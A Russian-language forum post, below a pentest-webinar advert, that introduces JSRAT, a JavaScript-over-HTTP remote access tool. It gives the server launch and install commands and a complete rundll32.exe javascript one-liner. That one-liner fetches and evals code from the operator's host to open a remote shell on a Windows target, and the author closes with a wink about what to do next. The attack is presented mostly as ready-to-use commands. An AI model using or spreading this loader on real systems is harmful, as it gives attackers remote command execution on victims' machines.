• ⚡️ Последний шанс: Вебинар по пентесту стартует через 30 минут!

    Друзья, ровно через 30 минут (8 июля в 19:00) начинается наш практический вебинар по пентесту и поиску уязвимостей!

    Если вы хотите:
    🕵️‍♀️ Узнать, как находить и эксплуатировать уязвимости в веб-приложениях.
    💡 Получить ценные инсайты от настоящего эксперта.
    🚀 Сделать решительный шаг в мир кибербезопасности.
    То этот вебинар для вас!

    Ведущий вебинара – Александр Медведев – эксперт с более чем 10-летним опытом в сфере информационной безопасности, пятикратный победитель Standoff и обладатель престижных сертификаций: OSWE, OSCP, PNPT, CEH, CWAPT.

    Успейте присоединиться! Зарегистрироваться сейчас

    Возникли сложности с регистрацией? Пишите нам: @Codeby_Academy
    Будем вас ждать!

JSRAT - HTTP-оболочка с использованием JavaScript

Всем привет.
Страница разработчика -== aspiggy/JSRAT
Разработчик -== aspiggy

Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента!
Введение.
ratbinary.png



JSRat - это инструмент управления и контроля, в котором используются служебные данные JavaScript и протокол HTTP для связи между сервером и целевыми узлами. Есть два варианта реализации в Python и один в PowerShell.

JSRat запустит веб-сервер и будет ждать выполнения команды клиента:
Код:
# python JSRat.py -i 192.168.42.101 -p 8080

После того, как пользователь посетит URL-адрес команды клиента, соединение будет установлено с хостом. JSRat может использоваться для выполнения команд, запускать исполняемые файлы/скрипты.

Screenshot from 2018-08-26 20-22-08.png

Чтобы установить правильную оболочку, необходимо выполнить загрузку JavaScript. Эта полезная нагрузка хранится по URL-адресу:

Screenshot from 2018-08-26 20-25-36.png

Команда, которая была сгенерирована, должна быть выполнена из командной строки:
Код:
Cmd Windows:
# rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.42.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

После выполнения команды будет получена оболочка.

Дальше вы знаете что делать. :devilish:;)

Код:
Пример:
# run
codeby.net.exe

Код:
Установка и запуск:
# git clone https://github.com/aspiggy/JSRAT.git
# cd JSRAT
# Пример запуска: python JSRat.py -i 192.168.42.101 -p 8080


Спасибо за внимание.
 
Последнее редактирование модератором:
какой дурак только будет вводить это в cmd)))
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы